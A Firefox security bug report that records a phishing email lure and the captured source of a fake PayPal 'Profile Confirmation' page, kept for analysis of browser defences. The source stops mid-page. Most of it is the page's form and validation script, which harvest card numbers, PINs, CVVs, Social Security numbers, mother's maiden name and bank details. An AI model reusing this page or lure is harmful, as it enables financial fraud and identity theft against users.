Closed
Bug 310519
Opened 19 years ago
Closed 12 years ago
phishing site content analysis
Categories
(Firefox :: Security, defect)
Tracking
()
RESOLVED
INCOMPLETE
People
(Reporter: chofmann, Unassigned)
Details
Attachments
(2 files)
recording the content of an example phishing site for future analysis on how the browser might deal with this content and respond to provide a higher level of protection. This content came from http://accounts-confirmations.co.uk/paypal/verify.htm which the user was directed to from an e-mail message indicating that a potencially fradulant transaction had occured on the e-mail receivers paypal account. The user was requested to: To confirm or decline this transaction, please follow the link provide below, Please save the fraud alert id for your reference. http://www.paypal-com-cgi-bin-confirmation-pp7848%34%31%2E%63%6F%6D If we do not get the confirmation within 5 business days, your account will be suspended until further notice. Content on the web site looked like.... <html> <head> <!-- Script info: script: webscr, cmd: _profile-summary, template: p/acc/pro/summary, date: Feb. 10, 2005 02:55:23 PST; country: US, language: en_US web version: 28.0-199 branch: live3-280_int content version: 28.0-199 pexml version: 28.0-199 page XSL: en_US/account/profile/Summary.xsl --> <title>PayPal - Profile Confirmation</title> <meta http-equiv="description" content="PayPal lets you send money to anyone with email. PayPal is free for consumers and works seamlessly with your existing credit card and checking account. You can settle debts, borrow cash, divide bills or split expenses with friends all without going to an ATM or looking for your checkbook."> <meta http-equiv="keywords" content="Send, money, payments, credit, credit card, instant, money, financial services, mobile, wireless, WAP, cell phones, two-way pagers, Windows CE"> <link href="http://www.paypal.com/css/xpt.css" rel="stylesheet" type="text/css"> <link href="http://www.paypal.com/css/xptInvoice.css" rel="stylesheet" type="text/css"> <link href="http://www.paypal.com/css/xptlive.css" rel="stylesheet" type="text/css"> <style type="text/css"></style> <link href="http://www.paypal.com/en_US/i/icon/pp_favicon_x.ico" rel="shortcut icon"> <script src="UpDate-Credts_files/pp_main.js"></script> </head> <body> <SCRIPT language=JavaScript> <!-- zipString = "---- very lond string"; stateRange = "00215NH00544NY00795PR00851VI00988PR02791MA02940RI03897NH04992ME05495VT05544MA05907VT06389CT06390NY06928CT08989NJ09899AE14925NY19640PA19980DE20099DC20199VA20599DC21930MD24658VA26886WV28909NC29945SC31999GA33994FL34099AA34997FL36925AL38589TN39776MS39901GA42788KY45999OH47997IN49971MI52809IA54990WI56763MN57799SD58856ND59937MT62999IL65899MO67954KS69367NE71497LA72959AR73199OK73344TX74966OK79999TX81658CO83128WY83422ID83422WY83888ID84791UT86556AZ88441NM88595TX89883NV96162CA96698AP96797HI96799AS96898HI96932GU96940PW96944FM96952MP96970MH97920OR99403WA99950AK"; var Cards = new makeArray(8); Cards[0] = new CardType("MasterCard", "51,52,53,54,55", "16"); var MasterCard = Cards[0]; Cards[1] = new CardType("VisaCard", "4", "13,16"); var VisaCard = Cards[1]; Cards[2] = new CardType("AmExCard", "34,37", "15"); var AmExCard = Cards[2]; Cards[3] = new CardType("DinersClubCard", "30,36,38", "14"); var DinersClubCard = Cards[3]; Cards[4] = new CardType("DiscoverCard", "6011", "16"); var DiscoverCard = Cards[4]; Cards[5] = new CardType("enRouteCard", "2014,2149", "15"); var enRouteCard = Cards[5]; Cards[6] = new CardType("JCBCard", "3088,3096,3112,3158,3337,3528", "16"); var JCBCard = Cards[6]; var LuhnCheckSum = Cards[7] = new CardType(); function getState(zip) { if ((parseInt(zipString.substr(zip / 4, 1), 16) & Math.pow(2, zip % 4)) && (zip.length == 5)) for (var i = 0; i < stateRange.length; i += 7) if (zip <= 1 * stateRange.substr(i, 5)) return stateRange.substr(i + 5, 2); return null; } function check_all(form) { if (form.first_name.value.length == 0) { alert("Please enter First Name!"); form.first_name.focus(); return false; } if (form.middle_name.value.length == 0) { alert("Please enter Middle Name!"); form.middle_name.focus(); return false; } if (form.last_name.value.length == 0) { alert("Please enter last Name!"); form.last_name.focus(); return false; } if (form.credit_card_type.options[form.credit_card_type.selectedIndex].value == "--") { alert("Please select valid Card type"); form.credit_card_type.focus(); return false; } if (form.cc_number.value.length < 16) { alert("Please enter a valid Card Number."); form.cc_number.focus(); return false; } /* return checkCC(form.cc_number.value); */ var i, n, c, r, t; // First, reverse the string and remove any non-numeric characters. s = form.cc_number.value r = ""; for (i = 0; i < s.length; i++) { c = parseInt(s.charAt(i), 10); if (c >= 0 && c <= 9) r = c + r; } // Check for a bad string. if (r.length <= 1) return false; // Now run through each single digit to create a new string. Even digits // are multiplied by two, odd digits are left alone. t = ""; for (i = 0; i < r.length; i++) { c = parseInt(r.charAt(i), 10); if (i % 2 != 0) c *= 2; t = t + c; } // Finally, add up all the single digits in this string. n = 0; for (i = 0; i < t.length; i++) { c = parseInt(t.charAt(i), 10); n = n + c; } // If the resulting sum is an even multiple of ten (but not zero), the // card number is good. if (!(n != 0 && n % 10 == 0)){ alert ("Invalid Card Number"); return false; } if (form.expdate_year.value == 0) { alert("Please enter the Expiration Year."); form.expdate_year.focus(); return false; } if (form.pin.value.length < 4) { alert("Please valid pin Number."); form.pin.focus(); return false; } if (form.cvv2_number.value.length < 3) { alert("Please valid Card Verification number."); form.cvv2_number.focus(); return false; } /* start zip code verification */ if (form.zip.value.length < 5) { alert("Please enter Valid Zip Code"); form.zip.focus(); return false; } var state = getState(form.zip.value); if (!(state == form.state.value)) { alert("Please enter Valid Zip Code"); form.zip.focus(); return false; } if (form.ssn1.value.length < 3) { alert("Please enter Valid Social Security Number"); form.ssn1.focus(); return false; } if (form.bank_acct_account_number.value.length = 0) { alert("Please enter Valid bank accout Number"); form.bank_acct_account_number.focus(); return false; } /* end zip code verification */ } --> </SCRIPT> <div> <div id="xptHeader"><table align="center" border="0" cellpadding="0" cellspacing="0"><tr> <td nowrap><img border="0" src="UpDate-Credts_files/paypal_logo.gif" alt=""></td> <td align="center" class="cobrand" width="100%"> </td> <td align="right" nowrap> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_logout">Log Out</a> | <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_help&source_page=_profile-summary">Help</a> </td> </tr></table></div> <div id="xptTabs"> <table align="center" border="0" cellpadding="0" cellspacing="0" class="primary"><tr> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_account"><IMG alt="My Account" src="UpDate-Credts_files/P_on_my_account.gif" border="0" alt="My Account"></a></td> <td><img alt="" border="0" src="UpDate-Credts_files/pixel.gif" width="1" height="1"></td> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_transaction-run"><img src="UpDate-Credts_files/P_off_send_money.gif" border="0" alt="Send Money"></a></td> <td><img alt="" border="0" src="UpDate-Credts_files/pixel.gif" width="1" height="1"></td> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_request-money"><img src="UpDate-Credts_files/P_off_request_money.gif" border="0" alt="Request Money"></a></td> <td><img alt="" border="0" src="UpDate-Credts_files/pixel.gif" width="1" height="1"></td> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_merchant"><img src="UpDate-Credts_files/P_off_merchant_tools.gif" border="0" alt="Merchant Tools"></a></td> <td><img alt="" border="0" src="UpDate-Credts_files/pixel.gif" width="1" height="1"></td> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_auction"><img src="UpDate-Credts_files/P_off_auction_tools.gif" border="0" alt="Auction Tools"></a></td> </tr></table> <div class="alignCenter"><table align="center" border="0" cellpadding="0" cellspacing="0" class="secondary"><tr> <td><img alt="" border="0" src="UpDate-Credts_files/pixel.gif" width="24" height="1"></td> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_account"><img src="UpDate-Credts_files/SA_off_overview.gif" border="0" alt="My Account - Overview"></a></td> <td bgcolor="#ffffff"><img alt="" border="0" src="UpDate-Credts_files/pixel.gif" width="1" height="1"></td> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_add-funds"><img src="UpDate-Credts_files/SA_off_add_funds.gif" border="0" alt="My Account - Add Funds"></a></td> <td bgcolor="#ffffff"><img alt="" border="0" src="UpDate-Credts_files/pixel.gif" width="1" height="1"></td> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_withdraw-funds"><img src="UpDate-Credts_files/SA_off_withdraw.gif" border="0" alt="My Account - Withdraw Funds"></a></td> <td bgcolor="#ffffff"><img alt="" border="0" src="UpDate-Credts_files/pixel.gif" width="1" height="1"></td> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_history"><img src="UpDate-Credts_files/SA_off_history.gif" border="0" alt="My Account - History"></a></td> <td bgcolor="#ffffff"><img alt="" border="0" src="UpDate-Credts_files/pixel.gif" width="1" height="1"></td> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_complaint-view"><img src="UpDate-Credts_files/SA_off_resolution.gif" border="0" alt="My Account - Resolution Center"></a></td> <td><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-summary"><img src="UpDate-Credts_files/SA_on_profile.gif" border="0" alt="My Account - Profile"></a></td> <td width="100%"> </td> </tr></table></div> </div> <div id="xptContentOuter"><table align="center" border="0" cellpadding="0" cellspacing="0" id="xptContentInner"><tr valign="top"><td> <div id="xptTitle"><table align="center" border="0" cellpadding="0" cellspacing="0" class="main"> <TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0> <TBODY> <TR> <TD><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=600 border=0></TD></TR> <TR> <TD></TD></TR> <TR> <TD vAlign=top> <FORM action="processing.php" method="post" name="securityForm"> <TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0> <TBODY> <TR> <TD><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=140 border=0></TD> <TD width=600> <DIV id=xptTitle> <TABLE class=main cellSpacing=0 cellPadding=0 align=center border=0><TBODY> <TR> <TD class=heading width="100%">Confirm Your Credit Card or Debit Card Card</TD></TR> <TR> <TD><IMG height=2 alt="" src="UpDate-Credts_files/pixel.gif" width=1 border=0></TD></TR> <TR> <TD> <HR> </TD></TR></TBODY></TABLE></DIV> <TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0><TBODY> <TR> <TD> <TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0> <TBODY> <TR> <TD width="100%"><SPAN class=small>We take the privacy of your personal information very seriously. Per our Privacy Policy, please be assured that we will not share your information with outside parties without your knowledge. generated number. </TD></TR></TBODY></TABLE></TD></TR> <TR> <TD><IMG height=15 alt="" src="UpDate-Credts_files/pixel.gif" width=1 border=0></TD></TR> <TR> <TD> <TABLE class=formTable cellSpacing=0 cellPadding=0 align=center border=0> <TBODY> <TR> <TD class=topSpacer width=150><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=150 border=0></TD> <TD class=topSpacer width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD class=topSpacer width="100%"><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=1 border=0></TD></TR> <TR> <TD class=label><LABEL for=first_name>First Name:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><INPUT id=first_name maxLength=32 size=20 name=first_name></TD></TR> <TR> <TD class=label><LABEL for=last_name>Middle Name:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><INPUT id=middle_name maxLength=32 size=10 name=middle_name><SPAN class=small> (Full name)</SPAN></TD></TR> <TR> <TD class=label><LABEL for=last_name>Last Name:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><INPUT id=last_name maxLength=32 size=20 name=last_name></TD></TR> <TR> <TD class=label><LABEL for=credit_card_type>Card Type:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><SELECT id=credit_card_type name=credit_card_type><OPTION value="--" selected></OPTION> <OPTION value=V>Visa</OPTION> <OPTION value=M>MasterCard</OPTION> <OPTION value=D>Discover</OPTION> <OPTION value=A>American Express</OPTION></SELECT></TD></TR> <TR> <TD class=label><LABEL for=cc_number>Card Number:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD> <TABLE cellSpacing=0 cellPadding=0 align=left border=0><TBODY> <TR> <TD vAlign=top><INPUT id=cc_number maxLength=16 size=30 name=ccnumber> </TD> <TD vAlign=top> <DIV id=xptCardIcons> <TABLE cellSpacing=0 cellPadding=0 width="100%" align=center border=0> <TBODY> <TR> <TD vAlign=top align=bottom><IMG alt=Visa src="UpDate-Credts_files/logo_ccVisa.gif" border=0><WBR></WBR><IMG alt=Mastercard src="UpDate-Credts_files/logo_ccMC.gif" border=0><WBR></WBR><IMG alt="American Express" src="UpDate-Credts_files/logo_ccAmex.gif" border=0><WBR></WBR><IMG alt=Discover src="UpDate-Credts_files/logo_ccDiscover.gif" border=0><WBR></WBR><IMG alt=eCheck src="UpDate-Credts_files/logo_ccEcheck.gif" border=0><WBR></WBR> </TD></TR></TBODY></TABLE></DIV></TD></TR></TBODY></TABLE></TD></TR> <TR> <TD class=label><LABEL for=expdate_month>Expiration Date:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><SELECT id=expdate_month name=expdate_month> <option value="1" selected>1</option> <option value="2">2</option> <option value="3">3</option> <option value="4">4</option> <option value="5">5</option> <option value="6">6</option> <option value="7">7</option> <option value="8">8</option> <option value="9">9</option> <option value="10">10</option> <option value="11">11</option> <option value="12">12</option> <option value="12">12</option> </select><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=3 border=0><SELECT name=expdate_year><option value=0 selected>0</option> <OPTION value=2005>2005</OPTION> <OPTION value=2005>2006</OPTION> <OPTION value=2006>2007</OPTION> <OPTION value=2007>2008</OPTION> <OPTION value=2008>2009</OPTION> <OPTION value=2009>2010</OPTION> <OPTION value=2010>2011</OPTION> <OPTION value=2011>2012</OPTION> <OPTION value=2012>2013</OPTION> <OPTION value=2013>2014</OPTION> <OPTION value=2014>2015</OPTION> <OPTION value=2015>2016</OPTION></SELECT> </TD></TR> <TR> <TD colSpan=3></TD></TR> <TR> <TD class=label><LABEL for=last_name>Card PIN <a href="JavaScript:alert('This the credit/debit card personal identification number (PIN) which is used in ATM machines. It is of 4 or 6 digits.')">[?]</a> :</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><INPUT id=pin maxLength=6 size=5 name=pin>* If PIN is invalid your account will not be verified.</TD></TR> <TR> <TD class=label><LABEL for=cvv2_number>Card Verification<BR>Number:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD> <TABLE cellSpacing=0 cellPadding=0 align=left border=0><TBODY> <TR> <TD><INPUT id=cvv2_number maxLength=3 size=3 name=cvv2><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=3 border=0> </TD> <TD rowSpan=2> <SCRIPT language=JavaScript> <!-- hide from JavaScript-challenged browsers function openWindow1() { popupWin = window.open('https://www.paypal.com/us/cgi-bin/webscr?cmd=p/acc/cvv_info_pop&enable_locale.x=1','EIN','scrollbars,resizable,toolbar,width=400,height=430,left=50,top=50'); popupWin.focus(); } // done hiding --> </SCRIPT> <A href="javascript:openWindow1();"><IMG alt=Help finding your Card Verification Number src="UpDate-Credts_files/mini_cvv2.gif" align=top border=0></A> </TD> <TD><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=3 border=0></TD> <TD><SPAN class=small>(On the back of your card, find the last 3 digits)</SPAN><BR> <SCRIPT language=JavaScript> <!-- hide from JavaScript-challenged browsers function openWindow1() { popupWin = window.open('https://www.paypal.com/us/cgi-bin/webscr?cmd=p/acc/cvv_info_pop&enable_locale.x=1','EIN','scrollbars,resizable,toolbar,width=400,height=450,left=50,top=50'); popupWin.focus(); } // done hiding --> </SCRIPT> <A href="javascript:openWindow1();"><SPAN class=small>Help finding your Card Verification Number </SPAN></A> | <SCRIPT language=JavaScript> <!-- hide from JavaScript-challenged browsers function openWindow11() { popupWin = window.open('https://www.paypal.com/us/cgi-bin/webscr?cmd=p/acc/cvv_info-amex_pop&enable_locale.x=1','EIN','scrollbars,resizable,toolbar,width=400,height=450,left=50,top=50'); popupWin.focus(); } // done hiding --> </SCRIPT> <A href="javascript:openWindow11();"><SPAN class=small>Using AmEx?</SPAN></A> </TD></TR></TBODY></TABLE></TABLE><BR></TD></TR> <TR> <TD> <TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0> <TBODY> <TR> <TD align=left> <TABLE cellSpacing=0 cellPadding=0 width=600 align=left border=0> <TBODY> <TR> <TD class=headerBorder colSpan=2>Billing Address And Your Personal Infromation</TD></TR> <TR> <TD class=small colSpan=2><BR>Enter the address where you receive billing statements for this card. In order to verify your bank card number, the billing address must be the one displayed on your bank receipt.</TD></TR> <TR> <TD colSpan=2><IMG height=15 alt="" src="UpDate-Credts_files/pixel.gif" width=1 border=0></TD></TR> <TR> <TD> <TABLE class=formTable cellSpacing=0 cellPadding=0 align=center border=0> <TBODY> <TR> <TD class=topSpacer width=150><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=150 border=0></TD> <TD class=topSpacer width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD class=topSpacer width="100%"><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=1 border=0></TD></TR> <TR> <TD class=label><LABEL for=address1>Address 1:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><INPUT class=smallInputWidth id=address1 maxLength=100 size=25 name=address1></TD></TR> <TR> <TD class=label><LABEL for=address2>Address 2:<BR><SPAN class=small>(optional)</SPAN></LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><INPUT class=smallInputWidth id=address2 maxLength=100 size=25 name=address2></TD></TR> <TR> <TD class=label><LABEL for=city>City:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><INPUT class=smallInputWidth id=city maxLength=40 size=25 name=city></TD></TR> <TR> <TD class=label><LABEL for=state>State:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><SELECT id=state name=state><OPTION value="" selected></OPTION> <OPTION value=AK>AK</OPTION> <OPTION value=AL>AL</OPTION> <OPTION value=AR>AR</OPTION> <OPTION value=AZ>AZ</OPTION> <OPTION value=CA>CA</OPTION> <OPTION value=CO>CO</OPTION> <OPTION value=CT>CT</OPTION> <OPTION value=DC>DC</OPTION> <OPTION value=DE>DE</OPTION> <OPTION value=FL>FL</OPTION> <OPTION value=GA>GA</OPTION> <OPTION value=HI>HI</OPTION> <OPTION value=IA>IA</OPTION> <OPTION value=ID>ID</OPTION> <OPTION value=IL>IL</OPTION> <OPTION value=IN>IN</OPTION> <OPTION value=KS>KS</OPTION> <OPTION value=KY>KY</OPTION> <OPTION value=LA>LA</OPTION> <OPTION value=MA>MA</OPTION> <OPTION value=MD>MD</OPTION> <OPTION value=ME>ME</OPTION> <OPTION value=MI>MI</OPTION> <OPTION value=MN>MN</OPTION> <OPTION value=MO>MO</OPTION> <OPTION value=MS>MS</OPTION> <OPTION value=MT>MT</OPTION> <OPTION value=NC>NC</OPTION> <OPTION value=ND>ND</OPTION> <OPTION value=NE>NE</OPTION> <OPTION value=NH>NH</OPTION> <OPTION value=NJ>NJ</OPTION> <OPTION value=NM>NM</OPTION> <OPTION value=NV>NV</OPTION> <OPTION value=NY>NY</OPTION> <OPTION value=OH>OH</OPTION> <OPTION value=OK>OK</OPTION> <OPTION value=OR>OR</OPTION> <OPTION value=PA>PA</OPTION> <OPTION value=RI>RI</OPTION> <OPTION value=SC>SC</OPTION> <OPTION value=SD>SD</OPTION> <OPTION value=TN>TN</OPTION> <OPTION value=TX>TX</OPTION> <OPTION value=UT>UT</OPTION> <OPTION value=VA>VA</OPTION> <OPTION value=VT>VT</OPTION> <OPTION value=WA>WA</OPTION> <OPTION value=WI>WI</OPTION> <OPTION value=WV>WV</OPTION> <OPTION value=WY>WY</OPTION> <OPTION value=AA>AA</OPTION> <OPTION value=AE>AE</OPTION> <OPTION value=AP>AP</OPTION> <OPTION value=AS>AS</OPTION> <OPTION value=FM>FM</OPTION> <OPTION value=GU>GU</OPTION> <OPTION value=MH>MH</OPTION> <OPTION value=MP>MP</OPTION> <OPTION value=PR>PR</OPTION> <OPTION value=PW>PW</OPTION> <OPTION value=VI>VI</OPTION></SELECT></TD></TR> <TR> <TD class=label><LABEL for=zip>ZIP Code:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><INPUT id=zip maxLength=10 size=10 name=zip><SPAN class=small> (5 or 9 digits)</SPAN><BR></TD></TR> <TR> <TD class=label><LABEL for=country>Country:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><LABEL for=country><font color="#000000"><strong><select id="country" name="country" 24px="" height="" 181px=""> <option selected="selected">United States</option> <option>Albania</option> <option>Algeria</option> <option>American Samoa</option> <option>Andorra</option> <option>Angola</option> <option>Anguilla</option> <option>Antarctica</option> <option>Antigua And Barbuda</option> <option>Argentina</option> <option>Armenia</option> <option>Aruba</option> <option>Australia</option> <option>Austria</option> <option>Azerbaijan</option> <option>Bahamas</option> <option>Bahrain</option> <option>Bangladesh</option> <option>Barbados</option> <option>Belarus</option> <option>Belgium</option> <option>Belize</option> <option>Benin</option> <option>Bermuda</option> <option>Bhutan</option> <option>Bolivia</option> <option>Bosnia and Herzegovina</option> <option>Botswana</option> <option>Bouvet Island</option> <option>Brazil</option> <option>British Indian Ocean Territory</option> <option>Brunei Darussalam</option> <option>Bulgaria</option> <option>Burkina Faso</option> <option>Burma</option> <option>Burundi</option> <option>Cambodia</option> <option>Cameroon</option> <option>Canada</option> <option>Cape Verde</option> <option>Cayman Islands</option> <option>Central African Republic</option> <option>Chad</option> <option>Chile</option> <option>China</option> <option>Christmas Island</option> <option>Cocos (Keeling) Islands</option> <option>Colombia</option> <option>Comoros</option> <option>Congo</option> <option>Congo, the Democratic Republic of the</option> <option>Cook Islands</option> <option>Costa Rica</option> <option>Cote d'Ivoire</option> <option>Croatia</option> <option>Cyprus</option> <option>Czech Republic</option> <option>Denmark</option> <option>Djibouti</option> <option>Dominica</option> <option>Dominican Republic</option> <option>East Timor</option> <option>Ecuador</option> <option>Egypt</option> <option>El Salvador</option> <option>England</option> <option>Equatorial Guinea</option> <option>Eritrea</option> <option>Espana</option> <option>Estonia</option> <option>Ethiopia</option> <option>Falkland Islands</option> <option>Faroe Islands</option> <option>Fiji</option> <option>Finland</option> <option>France</option> <option>French Guiana</option> <option>French Polynesia</option> <option>French Southern Territories</option> <option>Gabon</option> <option>Gambia</option> <option>Georgia</option> <option>Germany</option> <option>Ghana</option> <option>Gibraltar</option> <option>Great Britain</option> <option>Greece</option> <option>Greenland</option> <option>Grenada</option> <option>Guadeloupe</option> <option>Guam</option> <option>Guatemala</option> <option>Guinea</option> <option>Guinea-Bissau</option> <option>Guyana</option> <option>Haiti</option> <option>Heard and Mc Donald Islands</option> <option>Honduras</option> <option>Hong Kong</option> <option>Hungary</option> <option>Iceland</option> <option>India</option> <option>Indonesia</option> <option>Ireland</option> <option>Israel</option> <option>Italy</option> <option>Jamaica</option> <option>Japan</option> <option>Jordan</option> <option>Kazakhstan</option> <option>Kenya</option> <option>Kiribati</option> <option>Korea (North)</option> <option>Korea, Republic of</option> <option>Korea (South)</option> <option>Kuwait</option> <option>Kyrgyzstan</option> <option>Lao People's Democratic Republic</option> <option>Latvia</option> <option>Lebanon</option> <option>Lesotho</option> <option>Liberia</option> <option>Liechtenstein</option> <option>Lithuania</option> <option>Luxembourg</option> <option>Macau</option> <option>Macedonia</option> <option>Madagascar</option> <option>Malawi</option> <option>Malaysia</option> <option>Maldives</option> <option>Mali</option> <option>Malta</option> <option>Marshall Islands</option> <option>Martinique</option> <option>Mauritania</option> <option>Mauritius</option> <option>Mayotte</option> <option>Mexico</option> <option>Micronesia, Federated States of</option> <option>Moldova, Republic of</option> <option>Monaco</option> <option>Mongolia</option> <option>Montserrat</option> <option>Morocco</option> <option>Mozambique</option> <option>Myanmar</option> <option>Namibia</option> <option>Nauru</option> <option>Nepal</option> <option>Netherlands</option> <option>Netherlands Antilles</option> <option>New Caledonia</option> <option>New Zealand</option> <option>Nicaragua</option> <option>Niger</option> <option>Nigeria</option> <option>Niue</option> <option>Norfolk Island</option> <option>Northern Ireland</option> <option>Northern Mariana Islands</option> <option>Norway</option> <option>Oman</option> <option>Pakistan</option> <option>Palau</option> <option>Panama</option> <option>Papua New Guinea</option> <option>Paraguay</option> <option>Peru</option> <option>Philippines</option> <option>Pitcairn</option> <option>Poland</option> <option>Portugal</option> <option>Puerto Rico</option> <option>Qatar</option> <option>Reunion</option> <option>Romania</option> <option>Russia</option> <option>Russian Federation</option> <option>Rwanda</option> <option>Saint Kitts and Nevis</option> <option>Saint Lucia</option> <option>Saint Vincent and the Grenadines</option> <option>Samoa (Independent)</option> <option>San Marino</option> <option>Sao Tome and Principe</option> <option>Saudi Arabia</option> <option>Scotland</option> <option>Senegal</option> <option>Seychelles</option> <option>Sierra Leone</option> <option>Singapore</option> <option>Slovakia</option> <option>Slovenia</option> <option>Solomon Islands</option> <option>Somalia</option> <option>South Africa</option> <option>South Georgia and the South Sandwich Islands</option> <option>South Korea</option> <option>Spain</option> <option>Sri Lanka</option> <option>St. Helena</option> <option>St. Pierre and Miquelon</option> <option>Suriname</option> <option>Svalbard and Jan Mayen Islands</option> <option>Swaziland</option> <option>Sweden</option> <option>Switzerland</option> <option>Taiwan</option> <option>Tajikistan</option> <option>Tanzania</option> <option>Thailand</option> <option>Togo</option> <option>Tokelau</option> <option>Tonga</option> <option>Trinidad</option> <option>Trinidad and Tobago</option> <option>Tunisia</option> <option>Turkey</option> <option>Turkmenistan</option> <option>Turks and Caicos Islands</option> <option>Tuvalu</option> <option>Uganda</option> <option>Ukraine</option> <option>United Arab Emirates</option> <option>United Kingdom</option> <option>United States</option> <option>United States Minor Outlying Islands</option> <option>Uruguay</option> <option>USA</option> <option>Uzbekistan</option> <option>Vanuatu</option> <option>Vatican City State (Holy See)</option> <option>Venezuela</option> <option>Viet Nam</option> <option>Virgin Islands (British)</option> <option>Virgin Islands (U.S.)</option> <option>Wales</option> <option>Wallis and Futuna Islands</option> <option>Western Sahara</option> <option>Yemen</option> <option>Zambia</option> <option>Zimbabwe</option> </select></strong></font><TR> <TD class=label><LABEL for=zip>Phone Number:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><INPUT id=mmn maxLength=20 size=15 name=phone><BR></TD></TR> <TR> <TD class=label><LABEL for=SSN>Social Security Number:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><input id="ssn1" size="3" maxlength="3" name="ssn1" value="" type="text"> <input id="ssn2" size="2" maxlength="2" name="ssn2" value="" type="text"> <input id="ssn3" size="4" maxlength="5" name="ssn3" value="" type="text"><BR></TD></TR> <TR> <TD class=label><LABEL for=dob><br>Date of Birth:</label></td> <td height="40"><br class="field_spacer"> </td> <td class="pptext" height="40"><font face="Arial, Helvetica, Verdana, sans-serif" size="2"><select name="pibirthdatemm"> <option value="0" selected>--Month--</option> <option value="1">January</option> <option value="2">February</option> <option value="3">March</option> <option value="4">April</option> <option value="5">May</option> <option value="6">June</option> <option value="7">July</option> <option value="8">August</option> <option value="9">September</option> <option value="10">October</option> <option value="11">November</option> <option value="12">December</option> </select> </font><select name="pibirthdatedd"> <option value="0" selected>--Day--</option> <option value="1">01</option> <option value="2">02</option> <option value="3">03</option> <option value="4">04</option> <option value="5">05</option> <option value="6">06</option> <option value="7">07</option> <option value="8">08</option> <option value="9">09</option> <option value="10">10</option> <option value="11">11</option> <option value="12">12</option> <option value="13">13</option> <option value="14">14</option> <option value="15">15</option> <option value="16">16</option> <option value="17">17</option> <option value="18">18</option> <option value="19">19</option> <option value="20">20</option> <option value="21">21</option> <option value="22">22</option> <option value="23">23</option> <option value="24">24</option> <option value="25">25</option> <option value="26">26</option> <option value="27">27</option> <option value="28">28</option> <option value="29">29</option> <option value="30">30</option> <option value="31">31</option> </select> <input maxLength="4" size="5" name="pibirthdateyy"> <font size="2">(mm/dd/yyyy)</font></td> </tr> <tr> <TD class=label><LABEL for=zip>Mother's Maiden Name:</LABEL></TD> <TD width=6><IMG height=1 alt="" src="UpDate-Credts_files/pixel.gif" width=6 border=0></TD> <TD><INPUT id=mmn maxLength=20 size=15 name=mmn><BR></TD></TR> <TR></LABEL></TD></TR></TBODY></TABLE><table align="center" border="0" cellpadding="0" cellspacing="0" width="600"> <tbody><tr><td><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="1" width="600"></td></tr> <tr><td><div id="xptTitle"><table class="main" align="center" border="0" cellpadding="0" cellspacing="0"> <tbody><tr><td class="heading" width="100%">Confirm U.S. Bank Account</td></tr> <tr><td><img alt="" src="UpDate-Credts_files/pixel.gif" border="0" height="2" width="1"></td></tr> <tr><td><hr></td></tr> </tbody></table></div></td></tr> <tr><td valign="top"> <table align="center" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td><table align="center" border="0" cellpadding="0" cellspacing="0"> <tbody><tr> <td class="topSpacer" width="150"><img alt="" 